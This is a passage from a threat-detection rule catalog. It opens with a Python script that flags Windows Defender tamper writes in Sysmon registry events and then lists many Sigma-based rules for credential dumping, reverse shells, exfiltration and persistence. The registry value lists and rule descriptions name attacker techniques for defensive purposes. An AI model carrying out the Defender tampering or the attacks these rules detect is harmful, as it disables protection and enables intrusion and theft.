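    "disableantispyware", "disableantivirus", "disablebehaviormonitoring",
    "disableioavprotection", "disableonaccessprotection",
    "disablerealtimemonitoring", "disablescanonrealtimeenable",
    "disableblockatfirstseen", "disableroutinelytakingaction",
}
# DWORD 0 here turns cloud-delivered protection / sample submission off
_DISABLE_WHEN_ZERO = {"spynetreporting", "submitsamplesconsent"}
_DWORD = re.compile(r"^DWORD \((0x[0-9A-Fa-f]{8})\)$")


def sysmon_dword(details: str) -> Optional[int]:
    """Sysmon renders DWORD values as 'DWORD (0x00000001)'; return the integer,
    or None for other value types."""
    m = _DWORD.match(details.strip())
    return int(m.group(1), 16) if m else None


def defender_tamper_verdict(ev: dict) -> Optional[str]:
    if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
        return None
    low = str(ev.get("TargetObject", "")).lower()
    if not any(base in low for base in _DEFENDER_BASES):
        return None
    value_name = low.rsplit("\\", 1)[-1]
    value = sysmon_dword(str(ev.get("Details", "")))
    if value is None:
        return None
    if value_name in _DISABLE_WHEN_ONE and value == 1:
        return f"defender_component_disabled:{value_name}"
    if value_name in _DISABLE_WHEN_ZERO and value == 0:
        return f"defender_cloud_protection_off:{value_name}"
    return None


# Constructed Sysmon registry events (not real telemetry).
SAMPLE_REGISTRY = [
    {"EventID": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\SpynetReporting",
     "Details": "DWORD (0x00000000)"},
    # the same value written back to 0: protection restored, nothing to alert on
    {"EventID": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000000)"},
    # a Defender value outside the tamper list
    {"EventID": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Scan\ScanParameters",
     "Details": "DWORD (0x00000002)"},
    # unrelated key under a user hive
    {"EventID": 13, "EventType": "SetValue",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1104\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]


def scan(events=SAMPLE_REGISTRY):
    return [defender_tamper_verdict(e) for e in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_REGISTRY, scan()):
        print(f"{verdict!s:55} {ev['TargetObject']}")
```

Group Policy refreshes write these same values legitimately, so the writing process (the Image field, omitted from the constructed events above) is the usual tuning key; a successful write from an interactive tool such as reg.exe or regedit.exe is the case worth escalating.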

Rule Disabled CrashDump via Registry Detects CrashDump disabled through registry modification. Based on the CrashControl CrashDump Disabled Sigma rule by Tobias Michalski.

Used under Detection Rule License 1.1.

Rule Dllhost Outbound Network Connection Detects outbound connections initiated by dllhost.exe.
Rule Dllhost.exe Execution Anomaly Detects the dllhost.exe process spawning with no command line arguments which is rare and could indicate process injection activity or malware mimicking similar system processes. Based on the Dllhost.EXE Execution Anomaly Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Domain Trust Discovery Detects execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts. Based on the Domain Trust Discovery Sigma rule by E.M. Anhaus (originally from Atomic Blue Detections), Tony Lambert, oscd.community, and omkar72.

Used under Detection Rule License 1.1.

Rule DotNET DLL Loaded Via Office Application Detects any assembly DLL being loaded by a Microsoft Office product. Based on the DotNET Assembly DLL Loaded Via Office Application Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule Download Payload Using Edge Headless Feature Detects downloading of payloads using the Edge headless feature. Based on the Potential Arbitrary File Download Via MSEdge.EXE Sigma rule by Florian Roth (Nextron Systems), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Download Payload via Console Using Edge Detects downloading of payloads using the Edge console. Based on the Edge abuse for payload download via console Sigma rule by mdecrevoisier.

Used under Detection Rule License 1.1.

Rule Dump Credentials from Windows Credential Manager With PowerShell Detects adversaries searching for common password storage locations to obtain user credentials. Based on the Dump Credentials from Windows Credential Manager With PowerShell Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule ETW Trace Disabled Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. Based on the Disable of ETW Trace Sigma rule by @neu5ron, Florian Roth, Jonhnathan Ribeiro, and oscd.community.

Used under Detection Rule License 1.1.

Rule Email Account Discovery from Powershell Detects email account discovery from PowerShell.
Rule Encrypted Channel Activity Detects encrypted channel activity. Based on the Suspicious SSL Connection Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Enumerate Credentials from Windows Credential Manager With PowerShell Detects adversaries searching for common password storage locations to obtain user credentials.
Rule Excessive Number of nslookup from Powershell Detects an excessive number of nslookup invocations from PowerShell, a pattern used by DNS-based download cradles. Based on the Nslookup PowerShell Download Cradle - ProcessCreation Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Executable File Created by another Executable Triggers when an executable is created by another executable. Based on the Creation of an Executable by an Executable Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Execution of Dnscat Detects execution of Dnscat. Based on the Dnscat Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Execution of Exfiltration and Tunneling Tools Detects execution of exfiltration and tunneling tools. Based on the Exfiltration and Tunneling Tools Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Execution of Non-DLL Using Rundll32 Detects rundll32.exe loading a file that is not a DLL, such as a file with an image extension. Based on the Suspicious Rundll32 Execution With Image Extension Sigma rule by Hieu Tran.

Used under Detection Rule License 1.1.

Rule Execution of Tap Installer Software Detects execution of Tap Installer software. Based on the Tap Installer Execution Sigma rule by Daniil Yugoslavskiy, Ian Davis, and oscd.community.

Used under Detection Rule License 1.1.

Rule Exploitation of EQNEDT32 Detects exploitation of CVE-2017-11882, in which the Equation Editor process EQNEDT32.EXE spawns other processes. Based on the Droppers Exploiting CVE-2017-11882 Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule File Creation by Non-Privileged Processes in Program Files Directory Detects file creation by non-privileged processes in the Program Files directory. Based on the Files Dropped to Program Files by Non-Priviledged Process Sigma rule by Teymur Kheirkhabarov (idea), Ryan Plas (rule), and oscd.community.

Used under Detection Rule License 1.1.

Rule File Download Via Bitsadmin Detects usage of bitsadmin downloading a file. Based on the File Download Via Bitsadmin Sigma rule by Michael Haag, and FPT.EagleEye.

Used under Detection Rule License 1.1.

Rule File and Directory Permission Modification (Windows) Detects file and directory permission modification in Windows. Based on the File or Folder Permissions Modifications Sigma rule by Jakob Weinzettl, oscd.community, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule File and Directory Permission Modification after Download Detects file and directory permission modification after file download event.
Rule Finger Suspicious Invocation Detects suspicious execution of the legacy finger.exe tool, which is often used in current malware attacks. Based on the Finger.exe Suspicious Invocation Sigma rule by Florian Roth (Nextron Systems), omkar72, and oscd.community.

Used under Detection Rule License 1.1.

Rule GAC DLL Loaded Via Office Application Detects any GAC DLL being loaded by a Microsoft Office product. Based on the GAC DLL Loaded Via Office Applications Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule Get-ADUser User Discovery and Export Triggers on usage of the Get-ADUser cmdlet to collect user information and write it to a file. Based on the User Discovery And Export Via Get-ADUser Cmdlet - PowerShell Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Google Chrome DLL Sideloading Detects DLL sideloading in Google Chrome. Based on the Potential Chrome Frame Helper DLL Sideloading Sigma rule by Nasreddine Bencherchali (Nextron Systems), and Wietze Beukema (project and research).

Used under Detection Rule License 1.1.

Rule Hiding Files with Attrib Detects usage of attrib.exe to hide files from users. Based on the Hiding Files with Attrib.exe Sigma rule by Sami Ruohonen.

Used under Detection Rule License 1.1.

Rule Hybrid Connection Manager Service Installation Detects Hybrid Connection Manager service installation. Based on the HybridConnectionManager Service Installation Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule In-memory PowerShell Detects loading of essential DLLs used by PowerShell, but not by the process Powershell.exe. Based on the In-memory PowerShell Sigma rule by Tom Kern, oscd.community, Natalia Shornikova, and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Input Capture Using Mouse Lock Detects input capture using the Mouse Lock tool. Based on the Mouse Lock Credential Gathering Sigma rule by Cian Heasley.

Used under Detection Rule License 1.1.

Rule Linux Doas Tool Execution Detects Linux doas tool execution. Based on the Linux Doas Tool Execution Sigma rule by Sittikorn S, and Teoderick Contreras.

Used under Detection Rule License 1.1.

Rule Lookup System Locale Detects lookups of the system locale. Based on the Console CodePage Lookup Via CHCP Sigma rule by _pete_0, and TheDFIRReport.

Used under Detection Rule License 1.1.

Rule Malicious Base64 in Registry Detects registry write modifications where an adversary attempts to hide encoded commands. Based on the Suspicious Environment Variable Has Been Registered Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Malicious Named Pipe Triggers when a named pipe is created by known APT malware.
Rule Malicious PowerShell Scripts Detects the creation of known Powershell scripts for exploitation. Based on the Malicious PowerShell Scripts - FileCreation Sigma rule by Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, and Georg Lauenstein.

Used under Detection Rule License 1.1.

Rule Malicious Use of Control Panel Detects malicious use of control panel items. Based on the Control Panel Items by Kyaw Min Thein, and Furkan Caliskan (@caliskanfurkan_).

Used under Detection Rule License 1.1.

Rule Masquerading Task or Service Triggers on task or service masquerading.
Rule Microsoft Binary Github Communication Detects an executable in the Windows folder accessing github.com. Based on the Microsoft Binary Github Communication Sigma rule by Michael Haag (idea), Florian Roth (rule).

Used under Detection Rule License 1.1.

Rule Microsoft Binary Suspicious Communication Endpoint Detects an executable in the Windows folder accessing suspicious domains. Based on the Microsoft Binary Suspicious Communication Endpoint Sigma rule by Florian Roth (Nextron Systems), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Microsoft Office DLL Sideloading Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location. Based on the Microsoft Office DLL Sideload Sigma rule by Nasreddine Bencherchali (Nextron Systems), and Wietze Beukema (project and research).

Used under Detection Rule License 1.1.

Rule Microsoft Office Template Creation Detects the creation of template files for Microsoft Office from outside Office.
Rule Mimikatz Execution Detects well-known Mimikatz command line arguments. Based on the HackTool - Mimikatz Execution by Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Multiple Login Failures due to Bad Password Detects an adversary performing password spraying.
Rule Network Share Discovery Activity Detects network share discovery activity.
Rule Network Sniffing Activity Detects network sniffing activities. Based on the Network Sniffing Sigma rule by Timur Zinniatullin and oscd.community.

Used under Detection Rule License 1.1.

Rule New Certificate Added to Certificate Store Detects the addition of new root, CA or AuthRoot certificates to the Windows registry. Based on the New Root or CA or AuthRoot Certificate to Store Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule New Port Forwarding Rule Added Via Netsh Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule. Based on the New Port Forwarding Rule Added Via Netsh.EXE Sigma rule by Florian Roth (Nextron Systems), omkar72, oscd.community, and Swachchhanda Shrawan Poudel.

Used under Detection Rule License 1.1.

Rule New Service Creation Detects the creation of a new service.
Rule Non-Standard Port Usage Detects non-standard port usage. Based on the Suspicious Typical Malware Back Connect Ports Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Outlook C2 Macro Creation Detects the creation of a macro file for Outlook. Based on the Outlook C2 Macro Creation Sigma rule by @ScoubiMtl.

Used under Detection Rule License 1.1.

Rule Outlook Security Settings Changed in Registry Detects changes to Outlook email security settings. Based on the Change Outlook Security Setting in Registry Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Pass the Hash Activity Detects the attack technique pass the hash which is used to move laterally inside the network.
Rule Persistence Registry Key for Recycle Bin Detects persistence registry key for recycle bin. Based on the Registry Persistence Mechanisms in Recycle Bin Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Persistence and Execution at Scale via GPO Scheduled Task Detects lateral movement using a GPO scheduled task. Based on the Persistence and Execution at Scale via GPO Scheduled Task Sigma rule by Samir Bousseaden.

Used under Detection Rule License 1.1.

Rule Persistence via Services Registry Key Detects an adversary attempting to persist via service creation or modification of an existing service. Based on the ServiceDll Hijack Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Persistence via Startup Folder Detects when a file with a suspicious extension is created in the startup folder. Based on the Suspicious Startup Folder Persistence Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Phishing Patterns in ISO Archive Detects when an ISO file is opened with archive applications. Based on the Phishing Pattern ISO in Archive Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Possible Brute Force Attempt Detects an adversary performing a brute force attack.
Rule Possible Turla LightNeuron Backdoor Installation Triggers when a Turla LightNeuron Backdoor is installed. LightNeuron targets Microsoft Exchange email servers by making use of the Transport Agent.

Used under Detection Rule License 1.1.

Rule Potential Archive of Collected Data Triggers when data is archived or compressed for exfiltration. An adversary may compress data, such as sensitive documents, that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Rule Potential Boot or Logon Initialization Scripts Triggers when a modification is made to Windows logon scripts to initialize boot or logon scripts.
Rule Potential C2 Communication over a Non-Application Layer Protocol Detects adversaries using a non-application layer protocol for communication between host and C2 server or among infected hosts within a network.
Rule Potential Carbon Activity Detects Carbon activity which communicates with the C&C server to exfiltrate data.
Rule Potential ComRAT Activity Detects ComRAT activity, a PowerShell loader that creates scheduled tasks.
Rule Potential Command and Scripting Interpreters Triggers when command and scripting interpreters are detected.
Rule Potential Configuration And Service Reconnaissance Detects reconnaissance attempts from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. Based on the Query Registry Sigma rule by Timur Zinniatullin, oscd.community.

Used under Detection Rule License 1.1.

Rule Potential Crutch Activity Detects Crutch activity which encrypts and exfiltrates data.
Rule Potential DLL Injection Pattern Detected Detects potential use of CreateRemoteThread API and LoadLibrary function to inject a DLL into a process. Based on the CreateRemoteThread API and LoadLibrary by Roberto Rodriguez @Cyb3rWard0g.

Used under Detection Rule License 1.1.

Rule Potential DLL Search Order Hijacking Triggers on attempts by an unusual process to create a DLL file in a known desktop application dependencies folder, such as those of Slack, Teams, or OneDrive. This may indicate an attempt to load a malicious module via DLL search order hijacking. Based on the Potential Initial Access via DLL Search Order Hijacking Sigma rule by Tim Rauch (rule), and Elastic (idea).

Used under Detection Rule License 1.1.

Rule Potential Data Exfiltration Via Curl Detects the execution of the curl process with upload flags, which might indicate potential data exfiltration. Based on the Suspicious Curl File Upload Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Potential Empire Activity Detects Empire activity which hijacks Microsoft Outlook to exfiltrate data over mail.
Rule Potential Epic Activity Detects Turla Epic activity which searches for various terms within the victim system.
Rule Potential Exchange Exploit Activity Detected Detects potential Exchange exploit activity. Based on the Exchange Exploitation Activity Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Potential File and Directory Discovery Triggers when a file or directory is searched for information discovery. An adversary may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Rule Potential Flow of Execution Hijack Triggers when a DLL is loaded or deleted from a suspicious folder or file.
Rule Potential Gazer Activity Detects Turla Gazer activity which is a backdoor that uses various techniques for persistence.
Rule Potential Hidden File or Directory Triggers when file or directory attributes are changed or modified to hide artifacts from users.
Rule Potential HyperStack Activity Detects Turla HyperStack activity, which is a backdoor.
Rule Potential Indicator Removal Activity on Host Triggers when an adversary deletes or modifies artifacts generated on a host system to remove evidence of their presence or hinder defenses.
Rule Potential Ingress Tool Transfer Detects a suspicious call to Invoke-WebRequest, curl or wget where the output is located in a suspicious location. Based on the Suspicious Invoke-WebRequest Usage Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Potential Kazuar Activity Detects Kazuar activity, which is a shortcut creation and a sub-key added under the HKCU registry path.
Rule Potential LOLBIN Activity Triggers when a LOLBIN is used to execute code for a specified binary.
Rule Potential Lateral Movement via PowerShell Detects a PowerShell process spawned as a child or grandchild process of commonly abused processes during lateral movement. Based on the Possible Lateral Movement PowerShell Spawn Sigma rule by Mauricio Velazco, and Splunk.

Used under Detection Rule License 1.1.

Rule Potential MSExchange Mailbox Export Triggers when Exchange mailbox data is exported to a file.
Rule Potential Malicious MSExchange Transport Agent Installation Detects the installation of an Exchange Transport Agent.
Rule Potential Mosquito Activity Detects Mosquito activity, which is a Win32 backdoor.
Rule Potential PowerShell ReverseShell Connection Detects usage of the 'TcpClient' class, which can be abused to establish remote connections and reverse shells. Based on the Potential Powershell ReverseShell Connection Sigma rule by FPT.EagleEye, wagga, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Potential Proxy Forwarding Configuration Triggers when a proxy port is configured to be used in forwarding. Adversaries may configure proxy ports to bypass network restrictions through tunneling.
Rule Potential Registry or Environment Variable Unload Triggers when changes are made to environment variables or registry. This could indicate a precursor to a ransomware attack.
Rule Potential Scheduled Task Created Detects scheduled tasks created.
Rule Potential Security Software Discovery Triggers when security software is discovered. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and antivirus software.
Rule Potential Svchost Memory Access Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the WinRM Windows event logging service. Based on the Suspect Svchost Memory Access Sigma rule by Tim Burrell.

Used under Detection Rule License 1.1.

Rule Potential System DLL Sideloading From Non System Locations Detects DLL sideloading of DLLs usually located in system locations, such as System32, or SysWOW64. Based on the System DLL Sideloading From Non System Locations Sigma rule by Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), and XForceIR (SideLoadHunter Project).

Used under Detection Rule License 1.1.

Rule Potential TinyTurla Activity Detects TinyTurla activity that uses a fake DLL called w64time.dll. The legitimate Windows version is w32time.dll, which makes the malware less noticeable.
Rule Potential Turla Recon Activity Detects a common Turla activity which executes several reconnaissance commands to discover information about the victim machine and to move laterally.
Rule Potential Unix Shell Command and Scripting Interpreter Triggers when suspicious shell commands or program code may be executed through command and scripting interpreters.
Rule Potential Web Shell Dropped Detects potential web shells dropped. Based on the Suspicious ASPX File Drop by Exchange Sigma rule by Florian Roth (rule), MSTI (query, idea).

Used under Detection Rule License 1.1.

Rule Potential WinAPI Calls Via PowerShell Scripts Detects use of WinAPI Functions in PowerShell scripts. Based on the Potential WinAPI Calls Via PowerShell Scripts Sigma rule by Nikita Nazarov, oscd.community, and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Potential Windows Command Shell Interpreter Triggers on usage of path traversal in cmd.exe, indicating possible command or argument confusion or hijacking. Based on the Cmd.exe CommandLine Path Traversal Sigma rule by xknow @xknow_infosec, and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Potential Windows Scheduled Task Creation Triggers when adversaries attempt to create a scheduled task.
Rule Potential Windows Software Discovery Triggers when Windows software is discovered. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software with a vulnerability.
Rule PowerShell DownloadFile Detects the execution of PowerShell, a WebClient object creation and the invocation of DownloadFile in a single command line. Based on the PowerShell DownloadFile Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule PowerShell Profile Modification Triggers when a PowerShell profile is created or modified, which could indicate suspicious activity, as the profile can be used as a means of persistence. Based on the PowerShell Profile Modification Sigma rule by HieuTT35, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Powershell Keylogging Activity Detects Powershell keylogging activity. Based on the Powershell Keylogging Sigma rule by frack113.
Rule Powershell Local Email Collection Detects adversaries targeting user email on local systems to collect sensitive information. Based on the Powershell Local Email Collection by frack113.

Used under Detection Rule License 1.1.

Rule Powershell Remote Thread Creation Detects Powershell injecting code into critical Windows processes.
Rule Process Injection via Maldoc Detects process injection using maldoc. Based on the LittleCorporal Generated Maldoc Injection Sigma rule by Christian Burkard.

Used under Detection Rule License 1.1.

Rule Psexec Accepteula Agreement Detected Detects psexec accepteula activity. Based on the Psexec Accepteula Condition Sigma rule by omkar72.

Used under Detection Rule License 1.1.

Rule Python Core Image Load Detected Detects Python Core image load. Based on the Python Py2Exe Image Load Sigma rule by Patrick St. John, and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule Python Py2Exe Image Load Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. Based on the Python Py2Exe Image Load Sigma rule by Patrick St. John, and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule RDP Communication over Loopback Address Detects RDP communication over loopback address. Based on the RDP over Reverse SSH Tunnel WFP Sigma rule by Samir Bousseaden.

Used under Detection Rule License 1.1.

Rule Reconnaissance Activity Using BuiltIn Commands Detects the execution of a set of built-in commands often used in recon stages by different attack groups. Based on the Quick Execution of a Series of Suspicious Commands Sigma rule by juju4.

Used under Detection Rule License 1.1.

Rule Regedit Started with TrustedInstaller Privileges Detects regedit started with TrustedInstaller privileges or with ProcessHacker.exe. Based on the Regedit as Trusted Installer Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Registry Modification of Run Keys Detects registry modification of run keys. Based on the Suspicious Driver Install by pnputil.exe Sigma rule by Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, and Austin Songer @austinsonger.

Used under Detection Rule License 1.1.

Rule Regsvr32 Outbound Network Connection Detects outbound connections initiated by regsvr32.exe.
Rule Remote PowerShell Session Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account. Based on the Remote PowerShell Session (Network) Sigma rule by Roberto Rodriguez (@Cyb3rWard0g).

Used under Detection Rule License 1.1.

Rule Remote Scheduled Task Creation Detects remote scheduled task creations.
Rule Remote Service Activity via SVCCTL Named Pipe Detects remote service activity via remote access to the svcctl named pipe. Based on the Remote service creation via named pipes Sigma rule by mdecrevoisier.

Used under Detection Rule License 1.1.

Rule Remote Thread Creation in Suspicious Targets Detects a remote thread creation in suspicious target images. Based on the Remote Thread Creation in Suspicious Targets by Florian Roth.

Used under Detection Rule License 1.1.

Rule Root Certificate Installed Detects adversaries installing a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Rule RunDLL32 Outbound Network Connection Detects outbound connections initiated by rundll32.exe.
Rule Rundll32 with Suspicious Process Lineage Detects executions of rundll32.exe from unusual parent processes.
Rule Running of Hijacked Binary Detected Detects running of hijacked binary. Based on the Using SettingSyncHost.exe as LOLBin Sigma rule by Anton Kutepov, and oscd.community.

Used under Detection Rule License 1.1.

Rule Ryuk Ransomware Command Line Activity Detected Detects Ryuk ransomware command line activity. Based on the Ryuk Ransomware Command Line Activity Sigma rule by Vasiliy Burov.

Used under Detection Rule License 1.1.

Rule SMB Create Remote File Admin Share Detects non-system accounts accessing a file over SMB with write (0x2) access mask via an administrative share such as C$. Based on the SMB Create Remote File Admin Share Sigma rule by Jose Rodriguez (@Cyb3rPandaH), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule SSH Firewall Configuration Detects SSH firewall configuration. Based on the OpenSSH server firewall configuration on Windows (command) Sigma rule by mdecrevoisier.

Used under Detection Rule License 1.1.

Rule Script Initiated Connection Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use scripts to download malicious payloads. Based on the Script Initiated Connection Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Service Dll Hijacking Detects changes to the ServiceDLL value related to a service in the registry. This is often used as a method of persistence. Based on the ServiceDll Hijack Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Service Registry Permissions Weakness Check Detects adversaries checking for flaws in permissions inside the registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Based on the Service Registry Permissions Weakness Check Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule SetupComplete.cmd Exploitation Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd.
Rule Shadow Copies Creation Using Operating Systems Utilities Detects possible scenarios of credential access where shadow copies are created using operating system utilities. Based on the Shadow Copies Creation Using Operating Systems Utilities Sigma rule by Teymur Kheirkhabarov, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Shells Spawned by Web Servers Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack. Based on the Shells Spawned by Web Servers Sigma rule by Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Snatch Ransomware Activity Detected Detects Snatch ransomware activity. Based on the Snatch Ransomware Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Static Mimikatz Driver Name Detected Detects known exploited mimikatz driver names. Based on the PrinterNightmare Mimikatz Driver Name Sigma rule by Markus Neis, @markus_neis, and Florian Roth.

Used under Detection Rule License 1.1.

Rule Steganography Embedding Files Detects embedding of steganography files. Based on the Steganography Unzip Hidden Information From Picture File Sigma rule by Pawel Mazur.

Used under Detection Rule License 1.1.

Rule Steganography Extracting Files Detects extraction of steganography files. Based on the Steganography Extract Files with Steghide Sigma rule by Pawel Mazur.

Used under Detection Rule License 1.1.

Rule Steganography with RAR Detects a privilege escalation attempt via a rogue Windows directory environment variable. Based on the Suspicious Greedy Compression Using Rar.EXE Sigma rule by X__Junior (Nextron Systems), and Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Behavior by SOURGUM Actor Detects suspicious behavior by SOURGUM actor.
Rule Suspicious Binary DLL Execution Triggers when a DLL is executed from a specified directory.
Rule Suspicious Binary Load and Execution Triggers when an arbitrary DLL is loaded or executed from a specified binary.
Rule Suspicious CLR Logs Creation Detects suspicious .NET assembly executions. Based on the Suspicious CLR Logs Creation Sigma rule by omkar72, oscd.community, and Wojciech Lesicki.

Used under Detection Rule License 1.1.

Rule Suspicious Changing of User Agent Detects a suspicious changing of user agent. Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.
Rule Suspicious Copy Command from Admin Share Detects suspicious copy command from admin share. Based on the Copy from Admin Share Sigma rule by Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Suspicious Creation of Get-Variable File Detects suspicious creation of get-variable.exe file. Based on the Suspicious Get-Variable.exe Creation Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious Cron Scheduled Task/Job Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code.
Rule Suspicious Curl Download Detects a suspicious curl process start on Windows that outputs the requested document to a local file. Based on the Suspicious Curl.EXE Download Sigma rule by Florian Roth (Nextron Systems), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Double File Extension Process Detects processes with double file extensions. Based on the Suspicious Double Extension File Execution Sigma rule by Florian Roth (Nextron Systems), @blu3_team (idea), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Elevated System Shell Triggers when a shell program such as the Windows Command Prompt or PowerShell is launched with system privileges. Based on the Suspicious Elevated System Shell Sigma rule by frack113, and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Suspicious EventLog Cleared Detects clearing of event logs using wevtutil, PowerShell, and wmic.
Rule Suspicious Execution of GRP File Conversion Detects suspicious execution of .grp file conversion. Based on the Suspicious GrpConv Execution Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Execution of Outlook from Temporary Directory Detects Outlook executed from a temporary directory. Based on the Execution in Outlook Temp Folder Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Execution with Colorcpl Detects suspicious execution of colorcpl.exe. Based on the Suspicious Creation with Colorcpl Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious File Created by Office Application Detects executable and script file creation by Microsoft Office applications. Based on the Created Files by Office Applications Sigma rule by Vadim Khrykov (ThreatIntel), and Cyb3rEng (Rule).

Used under Detection Rule License 1.1.

Rule Suspicious File Download Using Office Application Detects the usage of Microsoft Word, Microsoft Excel, or Microsoft PowerPoint being used to download arbitrary files. Based on the Suspicious File Download Using Office Application Sigma rule by Beyu Denis, and oscd.community.

Used under Detection Rule License 1.1.

Rule Suspicious Get-Variable Creation Detects PowerShell Persistence via hijacking Get-Variable.exe. Based on the Suspicious Get-Variable.exe Creation Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious GetTypeFromCLSID ShellExecute Detects suspicious PowerShell code that executes COM objects. Based on the Suspicious GetTypeFromCLSID ShellExecute Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious Group And Account Reconnaissance Activity Detects suspicious reconnaissance command line activity on Windows systems.
Rule Suspicious Host File Deletion Activity Triggers when host files are deleted from a system.
